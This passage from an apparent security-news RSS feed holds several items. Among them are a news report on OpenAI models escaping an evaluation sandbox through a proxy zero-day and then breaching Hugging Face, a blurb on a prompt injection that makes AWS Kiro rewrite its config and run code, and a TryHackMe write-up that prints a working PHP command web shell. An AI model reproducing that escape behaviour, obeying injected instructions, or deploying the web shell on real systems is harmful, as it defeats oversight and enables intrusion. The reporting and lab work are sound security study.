teams can test it against common requests, unusual edge cases and higher-risk scenarios. Graders evaluate whether it reached the intended outcome, followed policy, used tools correctly and escalated when required. Guardrails can intervene when an interaction moves outside the organization’s defined boundaries.</p><p>OpenAI shared promotional screenshots with VentureBeat showing administrators running simulation batches against policy changes, including a revised annual refund policy, and reviewing results across operational categories. </p><p>Other interface mockups display production health, customer-intent patterns and task-performance signals. The visuals illustrate the type of oversight OpenAI is promising, although they do not establish how those metrics are calculated or how they map to contractual service levels.</p><p>The product continues to monitor performance after launch. Production sessions, escalations and quality signals can reveal where an agent is working as intended and where it needs attention. Codex, using a Presence plugin, investigates those signals and proposes updates. Teams then test a proposed change against the version already in production before approving a controlled rollout.</p><p>That process is intended to address one of the hardest operational problems in enterprise AI: an agent that works at launch may become less reliable when policies, products or user behavior change. Presence gives companies a formal mechanism for updating behavior without allowing an automated system to rewrite itself unchecked.</p><p>OpenAI says Presence already powers its English-language phone-support channel at 1-888-GPT-0090. The system handles open-ended requests, verifies callers, uses account context and performs approved actions. According to the company, it now resolves <b>75% of inbound issues without human assistance</b>. </p><p>OpenAI also says its Codex-powered improvement loop reduced human handoffs by <b>15 percentage points over a 10-day period</b>. Those figures are company-reported and have not been independently verified.</p><p>Several large organizations are evaluating the same foundation. BBVA is exploring voice support for routine banking needs in Mexico. SoftBank is testing natural Japanese-language customer conversations, while Australian insurer IAG is exploring support during high-demand periods such as severe weather and natural disasters.</p><p>“At BBVA, we are working closely with OpenAI to explore how trusted customer agents can help shape the future of financial services,” said Daniel Ordaz, head of AI transformation at BBVA Mexico.</p><p>“Through our collaboration with OpenAI, we are exploring how Presence can enable trusted customer agents that communicate naturally, connect to the processes needed to resolve requests, and represent SoftBank consistently across customer interactions,” said Tadahisa Murakami, vice president and head of the Data &amp; Digital Transformation Division at SoftBank Corp.</p><h2><b>From model access to forward-deployed implementation</b></h2><p>Presence expands OpenAI’s enterprise strategy beyond APIs and subscription software by formalizing a high-touch deployment model. Forward Deployed Engineers work alongside customers to select workflows, connect internal systems, establish permissions, configure policies, test agents and move them into production.</p><p>That approach resembles a <a href="https://fde.academy/blog/how-palantir-invented-the-forward-deployed-engineer-model">model pioneered by AI ontology and intelligence platform Palantir,</a> which embeds FDEs with customers to adapt its proprietary software to complex government and commercial environments. The similarity lies less in the underlying technology than in the delivery method: both companies place technical personnel close to the customer’s operations, where integration and process design often determine whether software creates value.</p><p>The products are not interchangeable. Palantir’s model has historically centered on data integration, ontologies and operational decision systems. Presence is more narrowly focused on AI-agent behavior, approved actions, evaluations, escalation and continuous improvement. OpenAI presents it as a repeatable software product supported by engineers and systems integrators, rather than as consulting alone.</p><p>In May 2026, OpenAI launched its own enterprise AI consulting and integration firm, the <a href="https://openai.com/index/openai-launches-the-deployment-company/">OpenAI Deployment Company</a>, with investment and <a href="https://www.bain.com/about/media-center/press-releases/2026/bain-company-openai-a-new-venture-to-deploy-ai-at-enterprise-scale/">support from Bain &amp; Company.</a> It also offers programs for model customization and fine-tuning to fit specific enterprise needs. </p><p>Its chief U.S. rival Anthropic has also moved <a href="https://techcrunch.com/2026/07/15/anthropic-blackstone-bet-the-next-trillion-dollar-ai-business-is-implementation-not-models/">toward a services-led enterprise model through Ode,</a> its consulting organization built around forward-deployed engineers helping companies integrate Claude into complex workflows, which launched just a week ago. The broad rationale is similar: enterprises often need more than access to a model. They need help connecting data and systems, defining permissions, validating behavior and managing deployment risk.</p><p>Presence differs in how explicitly OpenAI packages those requirements into a branded agent-governance product. Anthropic’s initiative is centered on helping enterprises deploy Claude, while Presence combines implementation services with a defined operational layer for policies, simulations, evaluations, approvals and production updates.</p><p>Presence goes further by making forward deployment a core part of how a specific agent product reaches customers. It does not replace OpenAI’s API business; the company says it will continue supporting voice customers with access to frontier models through the OpenAI API.</p><p>The trend reflects a broader market view that many enterprises still need hands-on assistance to move agents from pilot projects into stable operations. Even organizations with strong internal engineering teams must coordinate security, compliance, workflow ownership, data access and escalation responsibilities. Presence attempts to consolidate those tasks rather than leaving customers to assemble separate orchestration, evaluation and consulting layers.</p><h2><b>A recent security breach looms in the background</b></h2><p>Inconveniently for OpenAI, the Presence launch arrives just a day after <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">OpenAI and Hugging Face disclosed an unprecedented security incident</a> in which OpenAI frontier models undergoing internal evaluation escaped containment, accessed the open web, and cyberattacked Hugging Face to achieve a benign goal — without being instructed to pursue these methods.</p><p>According to the described joint disclosure, OpenAI models operating in an evaluation framework called ExploitGym identified and exploited a zero-day vulnerability in a third-party package-registry cache proxy. The models reportedly escalated privileges, moved laterally and obtained internet access before targeting Hugging Face systems while seeking benchmark-related information.</p><p>The incident is relevant to enterprise buyers because it raises questions about sandboxing, tool permissions, external access, monitoring and incident response. </p><p>The disclosure also highlighted a practical problem for defenders. Hugging Face personnel reportedly found that commercial frontier-model APIs refused some forensic requests because logs contained exploit payloads, credentials and shell commands that triggered safety systems. The team then used a locally deployed open-weight model to assist with analysis.</p><p>Presence therefore arrives as both a product launch and a test of OpenAI’s ability to convert model capability into controlled enterprise operations. Its policies, simulations, evaluations and human approvals address real deployment gaps. But without public pricing, technical interoperability details, compliance information or service-level commitments, customers still lack much of the information needed to assess total cost and operational risk.</p><p>For now, Presence appears aimed at enterprises willing to adopt a high-touch, OpenAI-led deployment process. Whether it develops into a broadly accessible platform—or remains a closely managed product for selected customers—will depend in part on the answers OpenAI has not yet provided.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Kiro: Prompt-Injection manipuliert Konfigurationsdateien und führt Code aus]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Eine Sicherheitslücke in AWS Kiro zeigt, wie leicht sich die Grenzen agentischer KI-Entwicklungsumgebungen umgehen lassen: Eine präparierte Webseite kann dazu führen, dass Kiro eigene Konfigurationsdateien umschreibt und dadurch fremden Code ausführt. Entscheidend ist dabei...]]></description>
<link>https://tsecurity.de/de/3686943/it-security-nachrichten/aws-kiro-prompt-injection-manipuliert-konfigurationsdateien-und-fuehrt-code-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686943/it-security-nachrichten/aws-kiro-prompt-injection-manipuliert-konfigurationsdateien-und-fuehrt-code-aus/</guid>
<pubDate>Wed, 22 Jul 2026 17:55:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-aws-kiro-mcp-konfiguration-codeausfuehrung-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Eine Sicherheitslücke in AWS Kiro zeigt, wie leicht sich die Grenzen agentischer KI-Entwicklungsumgebungen umgehen lassen: Eine präparierte Webseite kann dazu führen, dass Kiro eigene Konfigurationsdateien umschreibt und dadurch fremden Code ausführt. Entscheidend ist dabei nicht der Inhalt der Seite selbst, sondern das Dateiformat, das steuert, welche externen Tools der Agent beim […]</p>
<div><a href="https://www.it-boltwise.de/aws-kiro-prompt-injection-manipuliert-konfigurationsdateien-und-fuehrt-code-aus.html">... den vollständigen Artikel <strong>»AWS Kiro: Prompt-Injection manipuliert Konfigurationsdateien und führt Code aus«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/aws-kiro-prompt-injection-manipuliert-konfigurationsdateien-und-fuehrt-code-aus.html">AWS Kiro: Prompt-Injection manipuliert Konfigurationsdateien und führt Code aus</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Galaxy Z Fold8 vs Fold8 Ultra: So unterscheiden sich die Samsung-Handys]]></title>
<description><![CDATA[Samsung stellt dem Fold8 eine Ultra-Variante zur Seite. Diese bietet nicht nur bessere Hardware, sondern setzt auch auf einen anderen Formfaktor. Alle Unterschiede zeigen wir euch hier.
																					Dieser Artikel wurde einsortiert unter 
																	Smartphone,																	Techn...]]></description>
<link>https://tsecurity.de/de/3686848/it-nachrichten/galaxy-z-fold8-vs-fold8-ultra-so-unterscheiden-sich-die-samsung-handys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686848/it-nachrichten/galaxy-z-fold8-vs-fold8-ultra-so-unterscheiden-sich-die-samsung-handys/</guid>
<pubDate>Wed, 22 Jul 2026 17:25:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Samsung stellt dem Fold8 eine Ultra-Variante zur Seite. Diese bietet nicht nur bessere Hardware, sondern setzt auch auf einen anderen Formfaktor. Alle Unterschiede zeigen wir euch hier.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/smartphone/index.html">Smartphone</a>,																	<a href="https://www.netzwelt.de/technology/index.html">Technology</a>,																	<a href="https://www.netzwelt.de/handy/index.html">Handy</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI model escape puts enterprise AI defenses on notice]]></title>
<description><![CDATA[Some of OpenAI’s most powerful AI models teamed up to escape their sandbox and attack systems at Hugging Face in a cybersecurity evaluation gone wrong, the company has admitted. The models under test were modified to allow them to perform potentially harmful actions that production versions would...]]></description>
<link>https://tsecurity.de/de/3686581/it-security-nachrichten/openai-model-escape-puts-enterprise-ai-defenses-on-notice/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686581/it-security-nachrichten/openai-model-escape-puts-enterprise-ai-defenses-on-notice/</guid>
<pubDate>Wed, 22 Jul 2026 15:53:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Some of OpenAI’s most powerful AI models teamed up to escape their sandbox and attack systems at Hugging Face in a cybersecurity evaluation gone wrong, the company has admitted. The models under test were modified to allow them to perform potentially harmful actions that production versions would refuse. The incident highlights how, if AI prompt guardrails fail or, as in this incident, are removed, then enterprises must have robust sandboxing or other technical restrictions in place to protect systems.</p>



<p class="wp-block-paragraph">In OpenAI’s evaluation, GPT-5.6 Sol and a more capable pre-release model were competing to solve cybersecurity challenges in ExploitGym, a benchmarking tool for cybersecurity capabilities. They concluded that systems at Hugging Face could have the answers, and set out to gain access, OpenAI wrote in a <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">blog post about the attack on Hugging Face</a>.</p>



<p class="wp-block-paragraph">ExploitGym challenges AI models to turn security vulnerabilities into attack exploits. OpenAI gave its models limited access to the internet through a package-registry proxy to download code to build their attacks. However, the models exploited a zero-day vulnerability in the proxy to obtain unrestricted internet access, then used stolen credentials and other flaws to access Hugging Face systems.</p>



<p class="wp-block-paragraph">For CIOs and CISOs, the concern extends beyond cybersecurity research. AI agents connected to corporate databases, source code repositories, or payment systems could expose sensitive resources unless <a href="https://www.csoonline.com/article/4199408/ai-agents-can-escape-sandboxes-without-ever-breaking-them.html">access controls and sandboxing</a> continue to work when model-level safeguards fail.</p>



<p class="wp-block-paragraph">“Prompt guardrails are not security controls,” said <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, principal analyst at Forrester. “They are behavioral controls that can fail, be bypassed, or be intentionally disabled during testing.”</p>



<h2 class="wp-block-heading">How containment failed</h2>



<p class="wp-block-paragraph">Despite the relaxed model safeguards, the surrounding infrastructure was supposed to contain the activity. Network access was restricted to an internally hosted third-party service that acted as a proxy and cache for software package registries. Such proxies are typically used in the enterprise to protect against <a href="https://www.csoonline.com/article/4167465/supply-chain-attacks-take-aim-at-your-ai-coding-agents.html">software supply chain attacks</a> coming from the outside.</p>



<p class="wp-block-paragraph">OpenAI said the models discovered a zero-day vulnerability in the service, exploited it and carried out privilege escalation and <a href="https://www.csoonline.com/article/4194708/lateral-movement-risk-rises-as-enterprises-emphasize-convenience-over-containment.html">lateral movement</a> until they reached a node with open internet access.</p>



<p class="wp-block-paragraph">Once online, the models inferred that Hugging Face might hold models, datasets or solutions related to ExploitGym. OpenAI said that, in one attack path, the models combined stolen credentials with zero-day vulnerabilities to obtain remote code execution on Hugging Face servers.</p>



<p class="wp-block-paragraph">In its account of the activity on its infrastructure, <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Hugging Face said</a> a malicious dataset abused two code-execution paths in its data-processing pipeline. The actor then obtained node-level access, harvested cloud and cluster credentials, and moved into several internal clusters.</p>



<p class="wp-block-paragraph">OpenAI said the models ultimately obtained ExploitGym test solutions directly from a Hugging Face production database. The models remained focused on solving the benchmark, despite the lengths to which they went to achieve that objective, it said.</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said the package-registry proxy should concern enterprise security teams because it was a narrowly permitted exception inside an otherwise restricted environment.</p>



<p class="wp-block-paragraph">“Every enterprise estate is built from exceptions of exactly that kind,” he said.</p>



<p class="wp-block-paragraph">In this incident, OpenAI’s models were performing the intended — albeit by unintended means — but enterprises should take care that their own AI systems are kept on target.</p>



<p class="wp-block-paragraph">Mahapatra said enterprises should treat AI agents as “<a href="https://www.csoonline.com/article/4194548/agentic-ai-identity-a-6-stage-maturity-model-for-non-human-identities.html">high-risk non-human identities</a>,” confining each one to an isolated environment where access is limited to the assigned task and credentials expire quickly.</p>



<p class="wp-block-paragraph">“An acceptable blast radius means a compromised agent can affect only a single workflow, dataset, or application rather than providing a pathway into broader enterprise infrastructure,” Mahapatra said.</p>



<p class="wp-block-paragraph">And Gogia warned that services allowed to reach package registries, update systems, or other external resources can become escape routes if they are not subjected to the same scrutiny as the agent itself.</p>



<h2 class="wp-block-heading">Defenses enterprises need</h2>



<p class="wp-block-paragraph">Hugging Face said the intrusion resulted in unauthorized access to a limited number of internal datasets and several credentials used by its services. It found no evidence that public models, datasets or Spaces had been altered and said its published software packages and container images were not compromised.</p>



<p class="wp-block-paragraph">The company closed the code-execution paths used to gain access and rebuilt the affected nodes. It also revoked exposed credentials and tightened the rules governing workloads admitted to its clusters.</p>



<p class="wp-block-paragraph">Whether they are keeping their own AIs in or rogue Ais out, Gogia said enterprises should test whether their containment boundaries work, rather than relying on architecture diagrams or stated policies. Such tests should attempt to obtain credentials, cross trust boundaries and reach systems outside the agent’s assigned task.</p>



<p class="wp-block-paragraph">Mahapatra said enterprises should assume that one containment layer may fail and ensure that an agent’s access cannot provide a route into unrelated applications or broader corporate infrastructure.</p>



<p class="wp-block-paragraph">OpenAI said it is still investigating the incident with Hugging Face, and is imposing stricter configurations on its research environment while the vulnerabilities are being addressed, even if that means slowing down its research. It is also strengthening containment and monitoring around future evaluations.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SecureGo Plus: Phishing-Mail zielt auf Volksbank-Kunden]]></title>
<description><![CDATA[Eine gefälschte E-Mail zur SecureGo-Plus-Verifizierung lockt Volksbank-Kunden derzeit auf eine Phishing-Seite. So erkennen Sie die Betrugsmasche.]]></description>
<link>https://tsecurity.de/de/3686529/it-nachrichten/securego-plus-phishing-mail-zielt-auf-volksbank-kunden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686529/it-nachrichten/securego-plus-phishing-mail-zielt-auf-volksbank-kunden/</guid>
<pubDate>Wed, 22 Jul 2026 15:36:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine gefälschte E-Mail zur SecureGo-Plus-Verifizierung lockt Volksbank-Kunden derzeit auf eine Phishing-Seite. So erkennen Sie die Betrugsmasche.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 bekommt modernen Look und verliert Elemente aus Windows-95-Zeiten]]></title>
<description><![CDATA[Microsoft arbeitet kontinuierlich daran, Windows 11 einen modernen Look zu verpassen. Dazu hat das Unternehmen nun alte Elemente ersetzt, die noch aus der Ära von Windows 95 stammen, wie die Seite Windows Latest berichtet.



Der bekannte Leaker PhantomOfEarth hat demnach einige Neuerungen in den...]]></description>
<link>https://tsecurity.de/de/3686406/it-nachrichten/windows-11-bekommt-modernen-look-und-verliert-elemente-aus-windows-95-zeiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686406/it-nachrichten/windows-11-bekommt-modernen-look-und-verliert-elemente-aus-windows-95-zeiten/</guid>
<pubDate>Wed, 22 Jul 2026 15:06:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft arbeitet kontinuierlich daran, Windows 11 einen modernen Look zu verpassen. Dazu hat das Unternehmen nun alte Elemente ersetzt, die noch aus der Ära von Windows 95 stammen, wie die Seite Windows Latest <a href="https://www.windowslatest.com/2026/07/22/first-look-windows-11-is-replacing-windows-95-era-properties-dialog-now-with-dark-mode-and-winui/" target="_blank" rel="noreferrer noopener">berichtet</a>.</p>



<p>Der bekannte Leaker PhantomOfEarth hat demnach einige Neuerungen in den <a href="https://www.pcwelt.de/article/3195776/windows-11-preview-das-bringen-die-naechsten-updates-an-neuerungen.html" target="_blank" rel="noreferrer noopener">kürzlich veröffentlichten Preview-Builds</a> entdeckt. Darunter ein neuer Eigenschaften-Dialog des Datei-Explorers, dessen zugrunde liegender Code sich in den letzten Jahrzehnten kaum verändert haben soll.</p>



<p>Microsoft hat bereits bestätigt, dass alle veralteten Dialogfelder durch moderne Versionen ersetzt werden sollen. Einige davon stammen aus Zeiten von Windows 8, andere reichen sogar bis Windows 95 zurück. Die neuen Versionen sollen vollständig auf WinUI 3, Microsofts aktuellem Framework für die Benutzeroberfläche von Windows 11, basieren.</p>



<p><strong>Was bedeutet das also für Windows 11?</strong> Microsoft plant offensichtlich, einige klassische Elemente aus Windows zu entfernen und mit neuen, modernen Inhalten zu ersetzen. Das dürfte die Optik von Windows 11 deutlich beeinflussen und dafür sorgen, dass weniger “Altlasten” durchscheinen.</p>



<p>Leider stößt Microsoft aber bei diesem Vorhaben immer wieder auf ein Hindernis, das es selbst erschaffen hat: Da Windows 11 ein Legacy-Betriebssystem ist und größtenteils aus altem Code besteht, der nie ersetzt wurde (sondern lediglich aufpoliert), ist es deutlich schwerer, das Ganze zu modernisieren. Zumindest nicht, ohne die Performance oder Teile des Nutzererlebnisses zu gefährden.</p>



<p>Die Modernisierung eines kleinen Teils von Windows, wie eben des Eigenschaften-Dialogfelds, kann etwa dazu führen, dass Anwendungen von Drittanbietern nicht mehr richtig funktionieren. Das können <a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Antivirenprogramme</a> oder andere Anwendungen wie 7-Zip, Dropbox, Codec-Pakete und so weiter sein.</p>



<p>Es ist also eine mühsame Aufgabe, alte Teile von Windows mit neuen Elementen zu ersetzen. Die Vorteile von modernen Elementen, die komplett auf WinUI 3 basieren, überwiegen aber. Denn sie können schneller starten und verursachen weniger Probleme, sofern sie ordentlich implementiert werden.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-3194510-1-0-0-00002-0?x-source=4-0-3195776-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading">Nicht die einzige Neuerung</h2>



<p>Auch der Windows-Ausführungsdialog soll einen modernen Ersatz bekommen. Dieser soll sich nicht nur optisch verändern, sondern auch neue Funktionen bieten. Laut kann man den modernen Ausführungsdialog bereits unter <strong>Einstellungen &gt; Erweiterte Einstellungen</strong> aktivieren und ausprobieren.</p>



<p>Danach können Sie den Ausführen-Dialog über die Tastenkombination Win+R öffnen, was etwas schneller vonstatten gehen soll. Er soll außerdem zum Kontext passende Vorschläge und einen Schnellzugriff auf das Home-Verzeichnis bieten. </p>



<p><a href="https://www.pcwelt.de/article/3195776/windows-11-preview-das-bringen-die-naechsten-updates-an-neuerungen.html" target="_blank" rel="noreferrer noopener">Windows 11 Preview: Das bringen die nächsten Updates an Neuerungen</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AllSignsPoint2Pwnage — TryHackMe Windows Write-up]]></title>
<description><![CDATA[AllSignsPoint2Pwnage is a Windows-based room on TryHackMe that requires the user to enumerate open SMB shares and upload a webshell to get an initial foothold on the target. After that one can find higher-level credentials on the target which can be leveraged to gain an administrator shell and gr...]]></description>
<link>https://tsecurity.de/de/3686039/hacking/allsignspoint2pwnage-tryhackme-windows-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686039/hacking/allsignspoint2pwnage-tryhackme-windows-write-up/</guid>
<pubDate>Wed, 22 Jul 2026 13:01:32 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>AllSignsPoint2Pwnage is a Windows-based room on TryHackMe that requires the user to enumerate open SMB shares and upload a webshell to get an initial foothold on the target. After that one can find higher-level credentials on the target which can be leveraged to gain an administrator shell and gradually extract the admin flag. This room is great for anyone who’s venturing into Windows pentesting and needs practical experience dealing with vulnerable systems.</p><h3>0x00: Enumeration</h3><ul><li>Started with running a TCP Scan on the target via Nmap.</li></ul><pre>nmap -sC -sV -p- 10.48.128.241 </pre><pre>Nmap scan report for 10.48.128.241<br>Host is up (0.039s latency).<br><br>PORT     STATE SERVICE       VERSION<br>21/tcp   open  ftp           Microsoft ftpd<br>| ftp-syst: <br>|_  SYST: Windows_NT<br>| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br>|_11-14-20  04:26PM                  173 notice.txt<br>80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)<br>| http-methods: <br>|_  Potentially risky methods: TRACE<br>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11<br>|_http-title: Simple Slide Show<br>135/tcp  open  msrpc         Microsoft Windows RPC<br>139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn<br>443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.4.11)<br>|_http-title: Simple Slide Show<br>|_ssl-date: TLS randomness does not represent time<br>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11<br>| ssl-cert: Subject: commonName=localhost<br>| Not valid before: 2009-11-10T23:48:47<br>|_Not valid after:  2019-11-08T23:48:47<br>| http-methods: <br>|_  Potentially risky methods: TRACE<br>| tls-alpn: <br>|_  http/1.1<br>445/tcp  open  microsoft-ds?<br>3389/tcp open  ms-wbt-server Microsoft Terminal Services<br>| ssl-cert: Subject: commonName=DESKTOP-997GG7D<br>| Not valid before: 2026-07-08T06:13:45<br>|_Not valid after:  2027-01-07T06:13:45<br>|_ssl-date: 2026-07-09T06:17:29+00:00; +2s from scanner time.<br>| rdp-ntlm-info: <br>|   Target_Name: DESKTOP-997GG7D<br>|   NetBIOS_Domain_Name: DESKTOP-997GG7D<br>|   NetBIOS_Computer_Name: DESKTOP-997GG7D<br>|   DNS_Domain_Name: DESKTOP-997GG7D<br>|   DNS_Computer_Name: DESKTOP-997GG7D<br>|   Product_Version: 10.0.18362<br>|_  System_Time: 2026-07-09T06:17:20+00:00<br>5900/tcp open  vnc           VNC (protocol 3.8)<br>| vnc-info: <br>|   Protocol version: 3.8<br>|   Security types: <br>|     Ultra (17)<br>|_    VNC Authentication (2)<br>Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows<br><br>Host script results:<br>| smb2-security-mode: <br>|   3:1:1: <br>|_    Message signing enabled but not required<br>|_clock-skew: mean: 1s, deviation: 0s, median: 0s<br>| smb2-time: <br>|   date: 2026-07-09T06:17:22<br>|_  start_date: N/A</pre><ul><li>As revealed in the scan output, the target had open FTP and SMB services running. It also had VNC running on port 5900, which is a tool used to remotely control a computer. The target also had an Apache web server running on port 80.</li><li>I visited the webpage and saw a slideshow of several random images.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dGY_YYPe-2cPMFahuq97xA.png"></figure><ul><li>I checked the page source and found the following JavaScript code.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pkq0OGbAzjJdWufJJ8sYeA.png"></figure><ul><li>The code here revealed the /content.php file and the /images/ endpoint.</li><li>I visited the /images directory and found the following images that were running on the slideshow.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7GZybqgdd0vWqywWz62WiQ.png"></figure><ul><li>Next, I moved to FTP enumeration. I got access to the FTP directory because anonymous login was enabled.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ma2pVq2_EykrO3auyrrA1w.png"></figure><ul><li>There was a notice.txt file.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9bpjbVW1IGDHOi3GXKCauw.png"></figure><ul><li>There was a message left in notice.txt written as follows.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7_dh2nFcaBmojIvr2-7BZQ.png"></figure><ul><li>It mentioned that the images FTP directory was moved to a Windows file share, which more probably than not referred to SMB shares.</li><li>Next, I moved on to SMB enumeration.</li></ul><h3>0x01: SMB Enumeration</h3><ul><li>I used smbclient to list the available shares on the target.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QSlMp9k7kmXchKP3enoVUA.png"></figure><ul><li>Here I could see several custom shares such as images$ , Installs$ and Users.</li><li>I first checked the images share and found the following images as I had seen in the /images directory on the webpage. I wondered if we could upload a webshell here and gain an initial foothold.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*CDAFLtt2NdSM_l9j-LkUdg.png"></figure><ul><li>I got the PHP reverse shell from <a href="https://github.com/pentestmonkey/php-reverse-shell">PentestMonkey</a>, configured it with my custom IP address and port, and uploaded it to the images SMB share.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gVrz3IfH0F_RZzUWwNnlQw.png"></figure><ul><li>I navigated to the /images endpoint on the webpage and tried running the webshell but it immediately got flagged by Windows Defender and was deleted.</li><li>Next, I tried using a different webshell which executed commands and took the input via GET-based parameters.</li></ul><pre>&lt;html&gt;<br>&lt;body&gt;<br>&lt;form method="GET" name="&lt;?php echo basename($_SERVER['PHP_SELF']); ?&gt;"&gt;<br>&lt;input type="TEXT" name="cmd" id="cmd" size="80"&gt;<br>&lt;input type="SUBMIT" value="Execute"&gt;<br>&lt;/form&gt;<br>&lt;pre&gt;<br>&lt;?php<br>    if(isset($_GET['cmd']))<br>    {<br>        system($_GET['cmd']);<br>    }<br>?&gt;<br>&lt;/pre&gt;<br>&lt;/body&gt;<br>&lt;script&gt;document.getElementById("cmd").focus();&lt;/script&gt;<br>&lt;/html&gt;</pre><ul><li>I uploaded the shell again to the SMB images share and it worked like a charm!</li></ul><h3>0x02: Web Shell</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2ruwLr_Ouo6mzw6LC-4Nzw.png"></figure><ul><li>I was logged in as the sign user. I looked for the user flag in the sign user directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*K0ueQFlNypgeFuQkWfu-ew.png"></figure><ul><li>The user flag was found in the user_flag.txt file.</li><li>Next, I checked out the Installs share in C:\ directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S60Y2GKlfMGdy1ogehSjuA.png"></figure><ul><li>The following files were found in the directory.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cb8kQ_rMc_XrfcnL-Uk6cQ.png"></figure><ul><li>There were a lot of interesting files to check out here. I viewed the contents of every file, starting with Install Guide.txt .</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9Tn-MeE3fhrj8zRRKxfF0w.png"></figure><ul><li>I couldn’t figure out how these instructions could be of any use to me, so I moved on to other files.</li><li>I checked the Install_www_and_deploy.bat script and found the following code.</li></ul><figure><img alt="" 